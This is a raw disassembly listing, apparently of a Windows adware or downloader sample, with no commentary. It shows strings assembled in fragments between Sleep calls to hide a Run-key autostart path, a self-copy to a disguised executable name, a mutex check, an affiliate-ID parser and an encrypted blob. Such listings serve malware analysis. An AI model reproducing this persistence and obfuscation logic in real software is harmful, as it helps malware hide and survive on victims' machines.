push offset aFtWindowsCurre ; "ft\\Windows\\Curren"
lea ecx, [ebp-10h]
call sub_411548
push 1Ch
call esi ; Sleep
push offset aTversionR ; "tVersion\\R"
lea ecx, [ebp-10h]
call sub_411548
push 1Ch
call esi ; Sleep
push offset aUnRu ; "un\\ru"
lea ecx, [ebp-10h]
call sub_411548
push 1Ch
call esi ; Sleep
push offset aNner1 ; "nner1"
lea ecx, [ebp-10h]
call sub_411548
push 80000002h
push 1
push ecx
mov ecx, esp
mov [ebp-20h], esp
push offset aDefaultvalue ; "defaultvalue"
call sub_4114FA
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-1Ch], esp
push eax
mov byte ptr [ebp-4], 3
call sub_411506
lea ecx, [ebp-44h]
mov byte ptr [ebp-4], 2
call sub_40671B
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_41151E
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 5
call sub_41151E
lea eax, [ebp-1Ch]
lea ecx, [ebp-44h]
push eax
mov byte ptr [ebp-4], 6
call sub_406B4C
lea eax, [ebp-1Ch]
lea ecx, [ebp-18h]
push eax
mov byte ptr [ebp-4], 7
call sub_411518
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 6
call sub_411512
lea eax, [ebp+8]
push offset asc_41735C ; " "
push eax
lea eax, [ebp-20h]
push eax
call sub_41152A
lea ecx, [ebp+0Ch]
mov byte ptr [ebp-4], 8
push ecx
push eax
lea eax, [ebp-1Ch]
push eax
call sub_411524
push eax
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 9
call sub_411518
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 8
call sub_411512
lea ecx, [ebp-20h]
mov byte ptr [ebp-4], 6
call sub_411512
push dword ptr [ebp-14h]
push dword ptr [ebp-18h]
call dword_4131EC ; _mbscmp
pop ecx
test eax, eax
pop ecx
jz short loc_4052B7
push ecx
lea eax, [ebp-14h]
mov ecx, esp
mov [ebp-24h], esp
push eax
call sub_411506
lea ecx, [ebp-44h]
call sub_406BA8
loc_4052B7: ; CODE XREF: sub_405150+14E�j
push ecx
lea eax, [ebp+0Ch]
mov ecx, esp
mov [ebp-24h], esp
push eax
call sub_411506
mov ecx, edi
call sub_40592B
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 5
call sub_411512
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_411512
lea ecx, [ebp-44h]
mov byte ptr [ebp-4], 2
call sub_4068AF
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 1
call sub_411512
and byte ptr [ebp-4], 0
lea ecx, [ebp+8]
call sub_411512
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+0Ch]
call sub_411512
mov ecx, [ebp-0Ch]
pop edi
mov al, 1
mov large fs:0, ecx
pop esi
leave
retn 8
sub_405150 endp
; =============== S U B R O U T I N E =======================================
sub_405327 proc near ; CODE XREF: sub_40831F+176�p
mov eax, offset loc_411F8F
call sub_41163A ; _EH_prolog
sub esp, 34h
and dword ptr [ebp-1Ch], 0
push ebx
push esi
lea ecx, [ebp-10h]
call sub_41151E
push 1
lea ecx, [ebp-10h]
pop ebx
push offset aWr ; "WR"
mov [ebp-4], ebx
call sub_41150C
mov esi, dword_4130E0
push 1Eh
call esi ; Sleep
push offset dword_417130
lea ecx, [ebp-10h]
call sub_411548
push 1Dh
call esi ; Sleep
push offset aConfi ; "confi"
lea ecx, [ebp-10h]
call sub_411548
push 1Dh
call esi ; Sleep
push offset aGversion ; "gversion"
lea ecx, [ebp-10h]
call sub_411548
push 80000000h
push ebx
push ecx
mov ecx, esp
mov [ebp-18h], esp
push offset byte_419C40
call sub_4114FA
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-20h], esp
push eax
mov byte ptr [ebp-4], 2
call sub_411506
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_40671B
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_41151E
lea eax, [ebp-18h]
lea ecx, [ebp-40h]
push eax
mov byte ptr [ebp-4], 4
call sub_406B4C
lea eax, [ebp-18h]
lea ecx, [ebp-14h]
push eax
mov byte ptr [ebp-4], 5
call sub_411518
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_411512
mov ecx, [ebp+8]
lea eax, [ebp-14h]
push eax
call sub_411506
mov [ebp-1Ch], ebx
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_411512
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_4068AF
and byte ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_411512
mov eax, [ebp+8]
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_405327 endp
; =============== S U B R O U T I N E =======================================
sub_40543F proc near ; CODE XREF: sub_4091F5+6E�p
; sub_4091F5+12B�p ...
mov eax, offset loc_411FAC
call sub_41163A ; _EH_prolog
sub esp, 28h
push esi
push edi
lea ecx, [ebp-10h]
call sub_41151E
and dword ptr [ebp-4], 0
push offset aWr ; "WR"
lea ecx, [ebp-10h]
call sub_41150C
mov esi, dword_4130E0
push 1Ch
pop edi
push edi
call esi ; Sleep
push offset dword_417130
lea ecx, [ebp-10h]
call sub_411548
push edi
call esi ; Sleep
push offset aNex ; "nex"
lea ecx, [ebp-10h]
call sub_411548
push edi
call esi ; Sleep
push offset aTup ; "tup"
lea ecx, [ebp-10h]
call sub_411548
push edi
call esi ; Sleep
push offset aDate ; "date"
lea ecx, [ebp-10h]
call sub_411548
push 80000000h
push 1
push 0
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-14h], esp
push eax
call sub_411506
lea ecx, [ebp-34h]
call sub_406374
lea ecx, [ebp-34h]
mov byte ptr [ebp-4], 1
call sub_406606
mov edi, [ebp+8]
mov esi, eax
test edi, edi
jle short loc_4054F8
lea eax, [ebp+8]
push eax
call dword_4131A4 ; time
mov eax, [ebp+8]
pop ecx
lea esi, [eax+edi]
jmp short loc_405510
; ---------------------------------------------------------------------------
loc_4054F8: ; CODE XREF: sub_40543F+A4�j
test esi, esi
jnz short loc_405519
lea eax, [ebp+8]
push eax
call dword_4131A4 ; time
mov eax, [ebp+8]
pop ecx
lea esi, [eax+0B4h]
loc_405510: ; CODE XREF: sub_40543F+B7�j
push esi
lea ecx, [ebp-34h]
call sub_406633
loc_405519: ; CODE XREF: sub_40543F+BB�j
and byte ptr [ebp-4], 0
lea ecx, [ebp-34h]
call sub_4064C6
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-10h]
call sub_411512
mov ecx, [ebp-0Ch]
mov eax, esi
pop edi
mov large fs:0, ecx
pop esi
leave
retn 4
sub_40543F endp
; =============== S U B R O U T I N E =======================================
sub_405543 proc near ; CODE XREF: sub_402A1E+163�p
arg_0 = dword ptr 4
push ebx
push esi
push [esp+8+arg_0]
mov esi, ecx
push 0
push 0
call dword_4130B0 ; CreateMutexA
add esi, 0Ch
test eax, eax
mov [esi], eax
jz short loc_405576
call dword_413028 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_405576
push dword ptr [esi]
call dword_413020 ; CloseHandle
and dword ptr [esi], 0
loc_405576: ; CODE XREF: sub_405543+19�j
; sub_405543+26�j
cmp dword ptr [esi], 0
lea ecx, [esp+8+arg_0]
setz bl
call sub_411512
mov al, bl
pop esi
pop ebx
retn 4
sub_405543 endp
; =============== S U B R O U T I N E =======================================
sub_40558C proc near ; CODE XREF: sub_40831F+DE�p
mov eax, offset loc_411FF7
call sub_41163A ; _EH_prolog
sub esp, 34h
and dword ptr [ebp-1Ch], 0
push ebx
push esi
lea ecx, [ebp-10h]
call sub_41151E
push 1
lea ecx, [ebp-10h]
pop ebx
push offset aWr ; "WR"
mov [ebp-4], ebx
call sub_41150C
mov esi, dword_4130E0
push 1Eh
call esi ; Sleep
push offset dword_417130
lea ecx, [ebp-10h]
call sub_411548
push 1Ch
call esi ; Sleep
push offset aP_0 ; "p"
lea ecx, [ebp-10h]
call sub_411548
push 80000000h
push ebx
push ecx
mov ecx, esp
mov [ebp-18h], esp
push offset byte_419C40
call sub_4114FA
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-20h], esp
push eax
mov byte ptr [ebp-4], 2
call sub_411506
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_40671B
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_41151E
lea eax, [ebp-18h]
lea ecx, [ebp-40h]
push eax
mov byte ptr [ebp-4], 4
call sub_406B4C
lea eax, [ebp-18h]
lea ecx, [ebp-14h]
push eax
mov byte ptr [ebp-4], 5
call sub_411518
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_411512
mov ecx, [ebp+8]
lea eax, [ebp-14h]
push eax
call sub_411506
mov [ebp-1Ch], ebx
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_411512
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_4068AF
and byte ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_411512
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_40558C endp
; =============== S U B R O U T I N E =======================================
sub_405693 proc near ; CODE XREF: sub_40831F+A7�p
mov eax, offset loc_412043
call sub_41163A ; _EH_prolog
sub esp, 34h
and dword ptr [ebp-1Ch], 0
push ebx
push esi
lea ecx, [ebp-10h]
call sub_41151E
push 1
lea ecx, [ebp-10h]
pop ebx
push offset aW ; "W"
mov [ebp-4], ebx
call sub_41150C
mov esi, dword_4130E0
push 1Eh
call esi ; Sleep
push offset aR ; "R"
lea ecx, [ebp-10h]
call sub_411548
push 1Eh
call esi ; Sleep
push offset dword_417130
lea ecx, [ebp-10h]
call sub_411548
push 1Ch
call esi ; Sleep
push offset aI ; "i"
lea ecx, [ebp-10h]
call sub_411548
push 80000000h
push ebx
push ecx
mov ecx, esp
mov [ebp-18h], esp
push offset byte_419C40
call sub_4114FA
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-20h], esp
push eax
mov byte ptr [ebp-4], 2
call sub_411506
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_40671B
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_41151E
lea eax, [ebp-18h]
lea ecx, [ebp-40h]
push eax
mov byte ptr [ebp-4], 4
call sub_406B4C
lea eax, [ebp-18h]
lea ecx, [ebp-14h]
push eax
mov byte ptr [ebp-4], 5
call sub_411518
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_411512
mov ecx, [ebp+8]
lea eax, [ebp-14h]
push eax
call sub_411506
mov [ebp-1Ch], ebx
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_411512
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_4068AF
and byte ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_411512
mov eax, [ebp+8]
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_405693 endp
; =============== S U B R O U T I N E =======================================
sub_4057AB proc near ; CODE XREF: sub_404605+2E2�p
mov eax, offset loc_412090
call sub_41163A ; _EH_prolog
sub esp, 34h
push esi
and dword ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_41151E
push offset aW ; "W"
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 1
call sub_41150C
mov esi, dword_4130E0
push 1Eh
call esi ; Sleep
push offset aR ; "R"
lea ecx, [ebp-10h]
call sub_411548
push 1Eh
call esi ; Sleep
push offset dword_417130
lea ecx, [ebp-10h]
call sub_411548
push 1Ch
call esi ; Sleep
push offset aI ; "i"
lea ecx, [ebp-10h]
call sub_411548
mov eax, [ebp+8]
mov eax, [eax-8]
cmp eax, 3
jl loc_405904
push 80000000h
push 1
push ecx
mov ecx, esp
mov [ebp-1Ch], esp
push offset byte_419C40
call sub_4114FA
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-18h], esp
push eax
mov byte ptr [ebp-4], 2
call sub_411506
lea ecx, [ebp-40h]
mov byte ptr [ebp-4], 1
call sub_40671B
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_41151E
lea eax, [ebp-18h]
lea ecx, [ebp-40h]
push eax
mov byte ptr [ebp-4], 4
call sub_406B4C
lea eax, [ebp-18h]
lea ecx, [ebp-14h]
push eax
mov byte ptr [ebp-4], 5
call sub_411518
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_411512
lea eax, [ebp-14h]
push offset asc_4173DC ; ","
push eax
lea eax, [ebp-1Ch]
push eax
call sub_41152A
lea ecx, [ebp+8]
mov byte ptr [ebp-4], 6
push ecx
push eax
lea eax, [ebp-18h]
push eax
call sub_411524
push eax
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 7
call sub_411518
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 6
call sub_411512
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 4
call sub_411512
push ecx
lea eax, [ebp-14h]
mov ecx, esp
mov [ebp-20h], esp
push eax
call sub_411506
lea ecx, [ebp-40h]
call sub_406BA8
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_411512
lea ecx, [ebp-40h]
mov byte ptr [ebp-4], 1
call sub_4068AF
loc_405904: ; CODE XREF: sub_4057AB+6D�j
and byte ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_411512
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call sub_411512
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn 4
sub_4057AB endp
; =============== S U B R O U T I N E =======================================
sub_40592B proc near ; CODE XREF: sub_405150+178�p
mov eax, offset loc_4120CC
call sub_41163A ; _EH_prolog
sub esp, 30h
push esi
and dword ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_41151E
push offset aW ; "W"
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 1
call sub_41150C
mov esi, dword_4130E0
push 1Eh
call esi ; Sleep
push offset aR ; "R"
lea ecx, [ebp-10h]
call sub_411548
push 1Eh
call esi ; Sleep
push offset dword_417130
lea ecx, [ebp-10h]
call sub_411548
push 1Ch
call esi ; Sleep
push offset aCmd ; "cmd"
lea ecx, [ebp-10h]
call sub_411548
push 80000000h
push 1
push ecx
mov esi, offset a0 ; "0"
mov ecx, esp
mov [ebp-18h], esp
push esi
call sub_4114FA
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-1Ch], esp
push eax
mov byte ptr [ebp-4], 2
call sub_411506
lea ecx, [ebp-3Ch]
mov byte ptr [ebp-4], 1
call sub_40671B
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_41151E
lea eax, [ebp-18h]
lea ecx, [ebp-3Ch]
push eax
mov byte ptr [ebp-4], 4
call sub_406B4C
lea eax, [ebp-18h]
lea ecx, [ebp-14h]
push eax
mov byte ptr [ebp-4], 5
call sub_411518
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_411512
push esi
push dword ptr [ebp-14h]
call dword_4131EC ; _mbscmp
pop ecx
test eax, eax
pop ecx
jnz short loc_405A25
push ecx
lea eax, [ebp+8]
mov ecx, esp
mov [ebp-1Ch], esp
push eax
call sub_411506
lea ecx, [ebp-3Ch]
call sub_406BA8
loc_405A25: ; CODE XREF: sub_40592B+E1�j
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_411512
lea ecx, [ebp-3Ch]
mov byte ptr [ebp-4], 1
call sub_4068AF
and byte ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_411512
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call sub_411512
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn 4
sub_40592B endp
; =============== S U B R O U T I N E =======================================
sub_405A64 proc near ; CODE XREF: sub_408D9F+70�p
mov eax, offset loc_412117
call sub_41163A ; _EH_prolog
sub esp, 34h
and dword ptr [ebp-1Ch], 0
push ebx
push esi
lea ecx, [ebp-10h]
call sub_41151E
push 1
lea ecx, [ebp-10h]
pop ebx
push offset aW ; "W"
mov [ebp-4], ebx
call sub_41150C
mov esi, dword_4130E0
push 1Eh
call esi ; Sleep
push offset aR ; "R"
lea ecx, [ebp-10h]
call sub_411548
push 1Eh
call esi ; Sleep
push offset dword_417130
lea ecx, [ebp-10h]
call sub_411548
push 1Ch
call esi ; Sleep
push offset aC ; "c"
lea ecx, [ebp-10h]
call sub_411548
push 1Ch
call esi ; Sleep
push offset aMd ; "md"
lea ecx, [ebp-10h]
call sub_411548
push 1Ch
call esi ; Sleep
push 80000000h
push ebx
push ecx
mov ecx, esp
mov [ebp-18h], esp
push offset byte_419C40
call sub_4114FA
push ecx
lea eax, [ebp-10h]
mov ecx, esp
mov [ebp-20h], esp
push eax
mov byte ptr [ebp-4], 2
call sub_411506
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_40671B
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_41151E
lea eax, [ebp-18h]
lea ecx, [ebp-40h]
push eax
mov byte ptr [ebp-4], 4
call sub_406B4C
lea eax, [ebp-18h]
lea ecx, [ebp-14h]
push eax
mov byte ptr [ebp-4], 5
call sub_411518
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 4
call sub_411512
mov ecx, [ebp+8]
lea eax, [ebp-14h]
push eax
call sub_411506
mov [ebp-1Ch], ebx
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 3
call sub_411512
lea ecx, [ebp-40h]
mov [ebp-4], bl
call sub_4068AF
and byte ptr [ebp-4], 0
lea ecx, [ebp-10h]
call sub_411512
mov ecx, [ebp-0Ch]
mov eax, [ebp+8]
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_405A64 endp
; =============== S U B R O U T I N E =======================================
sub_405B91 proc near ; CODE XREF: sub_405E1F+5C�p
mov eax, offset loc_41213C
call sub_41163A ; _EH_prolog
mov eax, 8020h
call sub_4115D0
push ebx
push esi
push edi
mov [ebp-18h], ecx
xor ebx, ebx
lea ecx, [ebp-1Ch]
mov [ebp-4], ebx
call sub_41151E
push dword ptr [ebp+8]
mov esi, dword_4130CC
lea eax, [ebp-602Ch]
mov byte ptr [ebp-4], 1
push eax
call esi ; lstrcpyA
lea eax, [ebp-602Ch]
push eax
call dword_4130BC ; lstrlenA
mov ecx, [ebp-18h]
push eax
lea eax, [ebp-602Ch]
push eax
lea eax, [ebp-10h]
push eax
call sub_4030F7
push eax
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 2
call sub_411518
lea ecx, [ebp-10h]
mov byte ptr [ebp-4], 1
call sub_411512
push dword ptr [ebp-1Ch]
lea eax, [ebp-402Ch]
push eax
call dword_41329C ; wsprintfA
cmp byte ptr [ebp-402Ch], 23h
pop ecx
pop ecx
jnz loc_405DF5
push ebx
lea eax, [ebp-402Ch]
push 1
push eax
lea eax, [ebp-10h]
lea ecx, [ebp-14h]
push eax
call sub_401ACF
push dword ptr [eax]
lea eax, [ebp-402Ch]
push eax
call sub_411628 ; strcpy
pop ecx
pop ecx
lea ecx, [ebp-10h]
call sub_411512
lea eax, [ebp-402Ch]
push 23h
push eax
lea ecx, [ebp-14h]
call sub_401A20
mov edi, eax
cmp edi, ebx
mov [ebp-10h], edi
jz loc_405DF5
jmp short loc_405C78
; ---------------------------------------------------------------------------
loc_405C75: ; CODE XREF: sub_405B91+25E�j
mov edi, [ebp-10h]
loc_405C78: ; CODE XREF: sub_405B91+E2�j
cmp edi, 0FFFFFFFFh
jnz short loc_405C8F
lea eax, [ebp-402Ch]
push eax
lea eax, [ebp-202Ch]
push eax
call esi ; lstrcpyA
jmp short loc_405CB7
; ---------------------------------------------------------------------------
loc_405C8F: ; CODE XREF: sub_405B91+EA�j
push edi
lea eax, [ebp-402Ch]
push ebx
push eax
lea eax, [ebp-28h]
lea ecx, [ebp-14h]
push eax
call sub_401ACF
push dword ptr [eax]
lea eax, [ebp-202Ch]
push eax
call esi ; lstrcpyA
lea ecx, [ebp-28h]
call sub_411512
loc_405CB7: ; CODE XREF: sub_405B91+FC�j
inc edi
push ebx
lea eax, [ebp-402Ch]
push edi
push eax
lea eax, [ebp-20h]
push eax
lea ecx, [ebp-14h]
call sub_401ACF
push dword ptr [eax]
lea eax, [ebp-402Ch]
push eax
call esi ; lstrcpyA
lea ecx, [ebp-20h]
call sub_411512
lea eax, [ebp-202Ch]
push 3Ah
push eax
lea ecx, [ebp-14h]
call sub_401A20
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_405D4B
push edi
lea eax, [ebp-202Ch]
push ebx
push eax
lea eax, [ebp-24h]
lea ecx, [ebp-14h]
push eax
call sub_401ACF
push dword ptr [eax]
lea eax, [ebp-802Ch]
push eax
call esi ; lstrcpyA
lea ecx, [ebp-24h]
call sub_411512
inc edi
push ebx
lea eax, [ebp-202Ch]
push edi
push eax
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-14h]
call sub_401ACF
push dword ptr [eax]
lea eax, [ebp-202Ch]
push eax
call esi ; lstrcpyA
lea ecx, [ebp-2Ch]
call sub_411512
jmp short loc_405D70
; ---------------------------------------------------------------------------
loc_405D4B: ; CODE XREF: sub_405B91+165�j
lea eax, [ebp-202Ch]
push eax
lea eax, [ebp-802Ch]
push eax
call esi ; lstrcpyA
push 2000h
lea eax, [ebp-202Ch]
push ebx
push eax
call sub_411622 ; memset
add esp, 0Ch
loc_405D70: ; CODE XREF: sub_405B91+1B8�j
push 5
lea eax, [ebp-802Ch]
push offset aAffid ; "affID"
push eax
call dword_4131AC ; _strnicmp
add esp, 0Ch
test eax, eax
jnz short loc_405DD3
lea eax, [ebp-202Ch]
push eax
call sub_41162E ; strlen
cmp eax, 1
pop ecx
jle short loc_405DB8
push 89h
mov [ebp+eax-202Dh], bl
call dword_4130E0 ; Sleep
lea eax, [ebp-202Ch]
push eax
jmp short loc_405DC8
; ---------------------------------------------------------------------------
loc_405DB8: ; CODE XREF: sub_405B91+20A�j
push 0BCh
call dword_4130E0 ; Sleep
push offset byte_419C40
loc_405DC8: ; CODE XREF: sub_405B91+225�j
mov eax, [ebp-18h]
lea ecx, [eax+4]
call sub_41150C
loc_405DD3: ; CODE XREF: sub_405B91+1F8�j
cmp dword ptr [ebp-10h], 0FFFFFFFFh
jz short loc_405DF5
lea eax, [ebp-402Ch]
push 23h
push eax
lea ecx, [ebp-14h]
call sub_401A20
cmp eax, ebx
mov [ebp-10h], eax
jnz loc_405C75
loc_405DF5: ; CODE XREF: sub_405B91+90�j
; sub_405B91+DC�j ...
lea ecx, [ebp-1Ch]
mov [ebp-4], bl
call sub_411512
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp+8]
call sub_411512
mov ecx, [ebp-0Ch]
pop edi
pop esi
mov al, 1
pop ebx
mov large fs:0, ecx
leave
retn 4
sub_405B91 endp
; =============== S U B R O U T I N E =======================================
sub_405E1F proc near ; CODE XREF: sub_4091F5+59�p
mov eax, offset loc_4121D0
call sub_41163A ; _EH_prolog
sub esp, 68h
push ebx
push esi
push edi
mov edi, ecx
mov esi, dword_4130E0
and dword ptr [ebp-4], 0
push 0CE4h
call esi ; Sleep
lea ecx, [ebp-14h]
call sub_41151E
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 1
call sub_41151E
lea ecx, [ebp-34h]
mov byte ptr [ebp-4], 2
call sub_41151E
push 1Eh
mov byte ptr [ebp-4], 3
call esi ; Sleep
push ecx
lea eax, [ebp+8]
mov ecx, esp
mov [ebp-30h], esp
push eax
call sub_411506
mov ecx, edi
call sub_405B91
lea ebx, [edi+1Ch]
push offset aM ; "\\m"
lea eax, [ebp-2Ch]
push ebx
push eax
call sub_41152A
push eax
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 4
call sub_411518
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 3
call sub_411512
push 1Eh
call esi ; Sleep
push offset aRo ; "ro"
lea ecx, [ebp-14h]
call sub_411548
push 1Eh
call esi ; Sleep
push offset aFinu ; "finu"
lea ecx, [ebp-14h]
call sub_411548
push 1Ch
call esi ; Sleep
lea eax, [edi+4]
push offset a_ex ; ".ex"
push eax
lea eax, [ebp-2Ch]
push eax
call sub_41152A
push eax
lea ecx, [ebp-14h]
mov byte ptr [ebp-4], 5
call sub_411554
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 3
call sub_411512
push offset aE ; "e"
lea ecx, [ebp-14h]
call sub_411548
push ebx
lea ecx, [ebp-18h]
call sub_411518
push offset dword_417130
lea ecx, [ebp-18h]
call sub_411548
push 1Dh
call esi ; Sleep
push offset aMr ; "mr"
lea ecx, [ebp-18h]
call sub_411548
push 1Eh
call esi ; Sleep
push offset aOf ; "of"
lea ecx, [ebp-18h]
call sub_411548
lea eax, [edi+4]
push eax
lea eax, [ebp-28h]
push offset aInu ; "inu"
push eax
call sub_41154E
push offset a_exe_tmp ; ".exe.tmp"
push eax
lea eax, [ebp-2Ch]
mov byte ptr [ebp-4], 6
push eax
call sub_41152A
push eax
lea ecx, [ebp-18h]
mov byte ptr [ebp-4], 7
call sub_411554
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 6
call sub_411512
lea ecx, [ebp-28h]
mov byte ptr [ebp-4], 3
call sub_411512
push 1Ch
call esi ; Sleep
push ecx
lea eax, [ebp+8]
mov ecx, esp
mov [ebp-30h], esp
push eax
call sub_411506
push ecx
lea eax, [ebp-14h]
mov ecx, esp
mov [ebp-2Ch], esp
push eax
mov byte ptr [ebp-4], 8
call sub_411506
mov ecx, edi
mov byte ptr [ebp-4], 3
call sub_405150
push dword ptr [edi+20h]
lea ebx, [edi+20h]
push dword ptr [ebp-14h]
call dword_4131EC ; _mbscmp
pop ecx
test eax, eax
pop ecx
jz short loc_406026
push dword ptr [ebp-18h]
call sub_4021DB
test eax, eax
pop ecx
jz short loc_405FEA
push 1
push dword ptr [ebp-18h]
call sub_401C92
pop ecx
pop ecx
loc_405FEA: ; CODE XREF: sub_405E1F+1BD�j
push dword ptr [ebp-14h]
call sub_4021DB
test eax, eax
pop ecx
jz short loc_406007
push 1
push dword ptr [ebp-18h]
push dword ptr [ebp-14h]
call sub_401D8A
add esp, 0Ch
loc_406007: ; CODE XREF: sub_405E1F+1D6�j
mov eax, [ebx]
push 1
push dword ptr [ebp-14h]
push eax
call sub_401D8A
add esp, 0Ch
test eax, eax
jz short loc_406026
lea eax, [ebp-14h]
mov ecx, ebx
push eax
call sub_411518
loc_406026: ; CODE XREF: sub_405E1F+1B0�j
; sub_405E1F+1FA�j
push 80000002h
push 1
push ecx
mov ecx, esp
mov [ebp-30h], esp
push offset aDefaultvalue ; "defaultvalue"
call sub_4114FA
push ecx
mov ecx, edi
mov eax, esp
mov [ebp-2Ch], esp
push 72h
push offset a11866787a5f240 ; "11866787A5F240675EE6610530A652BC94C74E7"...
push eax
mov byte ptr [ebp-4], 9
call sub_4030F7
lea ecx, [ebp-74h]
mov byte ptr [ebp-4], 3
call sub_40671B
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 0Ah
call sub_41151E
push offset aWr ; "WR"
lea ecx, [ebp-1Ch]
mov byte ptr [ebp-4], 0Bh
call sub_41150C
push 1Ch
call esi ; Sleep
push offset aVersion_1 ; "\\version"
lea ecx, [ebp-1Ch]
call sub_411548
push 80000000h
push 1
push ecx
mov ecx, esp
mov [ebp-30h], esp
push edi
call sub_411506
push ecx
lea eax, [ebp-1Ch]
mov ecx, esp
mov [ebp-2Ch], esp
push eax
mov byte ptr [ebp-4], 0Ch
call sub_411506
lea ecx, [ebp-54h]
mov byte ptr [ebp-4], 0Bh
call sub_40671B
lea eax, [ebp-24h]
lea ecx, [ebp-74h]
push eax
mov byte ptr [ebp-4], 0Dh
call sub_406B4C
lea eax, [ebp-24h]
lea ecx, [ebp-2Ch]
push eax
mov byte ptr [ebp-4], 0Eh
call sub_411506
push eax
lea ecx, [edi+24h]
mov byte ptr [ebp-4], 0Fh
call sub_411518
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 0Eh
call sub_411512
lea ecx, [ebp-24h]
mov byte ptr [ebp-4], 0Dh
call sub_411512
push dword ptr [edi]
mov ebx, dword_4131A8
call ebx ; atoi
pop ecx
mov [ebp-2Ch], eax
mov dword ptr [ebp-4], 0Dh
push 26h
call esi ; Sleep
and dword ptr [ebp-20h], 0
lea eax, [edi+14h]
mov [ebp-24h], eax
loc_40612A: ; CODE XREF: sub_405E1F+358�j
lea eax, [ebp-28h]
lea ecx, [ebp-54h]
push eax
call sub_406B4C
mov ecx, [ebp-24h]
lea eax, [ebp-28h]
push eax
mov byte ptr [ebp-4], 12h
call sub_411518
lea ecx, [ebp-28h]
mov byte ptr [ebp-4], 0Dh
call sub_411512
mov eax, [ebp-24h]
push dword ptr [eax]
call ebx ; atoi
cmp eax, [ebp-2Ch]
pop ecx
mov [ebp-30h], eax
mov dword ptr [ebp-4], 0Dh
jge short loc_406179
push 13A5h
call esi ; Sleep
inc dword ptr [ebp-20h]
cmp dword ptr [ebp-20h], 0Ah
jl short loc_40612A
loc_406179: ; CODE XREF: sub_405E1F+348�j
mov eax, [ebp-2Ch]
cmp [ebp-30h], eax
jle short loc_406187
mov byte ptr [edi+18h], 1
jmp short loc_4061A1
; ---------------------------------------------------------------------------
loc_406187: ; CODE XREF: sub_405E1F+360�j
and byte ptr [edi+18h], 0
push ecx
mov ecx, esp
mov [ebp-30h], esp
